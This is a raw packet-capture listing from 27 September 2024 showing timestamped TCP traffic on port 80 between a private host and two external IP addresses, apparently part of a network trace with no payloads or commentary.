Sep 27, 2024 04:21:18.339725971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339760065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339771032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339780092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339783907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339796066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339798927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339808941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339819908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339860916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339867115 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339867115 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339871883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339884043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339895010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339904070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339915037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339931965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339931965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339945078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339955091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339967012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.339977026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.339977026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.340063095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.373723984 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:18.374033928 CEST	49726	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:18.379077911 CEST	80	49721	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:18.379170895 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:18.379246950 CEST	80	49726	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:18.379312038 CEST	49726	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:18.379328966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379400969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379410982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379421949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379440069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379443884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379455090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379491091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379494905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379494905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379503012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379535913 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379535913 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379578114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379590034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379602909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379616022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379626989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379643917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.379651070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379651070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379688025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.379688025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380351067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380389929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380422115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380433083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380441904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380475044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380475044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380486012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380496025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380497932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380508900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380521059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380538940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380546093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380546093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380551100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380595922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380595922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380609989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380620003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380630970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380646944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380713940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380724907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380743027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.380783081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.380986929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.382704020 CEST	49726	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:18.387486935 CEST	80	49726	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:18.389213085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389239073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389250040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389269114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389314890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389333010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389343977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389355898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389368057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389394999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389455080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389487028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389498949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389511108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389523029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389533997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389544964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389554977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389559031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389570951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389573097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389584064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389599085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389599085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389621019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389633894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389633894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389647007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389659882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389683008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389683008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389817953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389828920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389839888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389851093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389861107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389861107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389861107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389878035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389883995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389892101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389904022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389916897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389925957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389925957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389928102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389942884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389954090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389962912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389962912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.389966965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.389981031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390011072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.390011072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.390042067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390053988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390064955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390077114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390088081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390100002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.390101910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.390101910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.390145063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.390145063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.409638882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409670115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409682035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409699917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409709930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409713030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.409713030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.409723043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409735918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409754992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.409754992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.409780979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.409953117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.409953117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412245989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412266016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412280083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412291050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412302971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412307978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412314892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412307978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412328005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412350893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412350893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412406921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412425041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412435055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412451029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412461996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412466049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412466049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412473917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412487030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412499905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412503958 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412503958 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412548065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412548065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412671089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412679911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412739992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412808895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412822962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412857056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412868023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412878990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412889004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.412906885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412906885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412919998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.412945986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432092905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432106018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432117939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432136059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432137966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432149887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432162046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432163000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432173967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432184935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432199001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432230949 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432244062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432276964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432276964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432306051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432316065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432326078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432337046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432348013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432349920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432372093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432446957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432457924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.432485104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432485104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.432626009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472239017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472254992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472275972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472286940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472306013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472309113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472316980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472328901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472340107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472349882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472351074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472363949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472372055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472373962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472388029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472398043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472404003 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472419024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472419977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472430944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472448111 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472476959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472476959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.472946882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472966909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.472976923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473006010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473006964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473128080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473139048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473149061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473160028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473170042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473181009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473191977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473192930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473192930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473201990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473212957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473226070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473226070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473228931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473258018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473278046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473306894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473316908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473325968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.473366022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.473401070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.481738091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481794119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.481825113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481837034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481847048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481858969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481870890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481880903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481884003 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.481884956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.481972933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.481980085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.481991053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482009888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482026100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482027054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482038975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482049942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482052088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482052088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482073069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482117891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482151031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482161999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482172012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482182980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482193947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482202053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482202053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482206106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482239962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482239962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482404947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482417107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482425928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482434988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482445955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482455015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482469082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482469082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482469082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482481003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482503891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482503891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482563972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482574940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482578039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482587099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482598066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482609034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482619047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482630014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482633114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482634068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482645988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482667923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482667923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482703924 CEST	80	49725	185.215.113.117	192.168.2.5
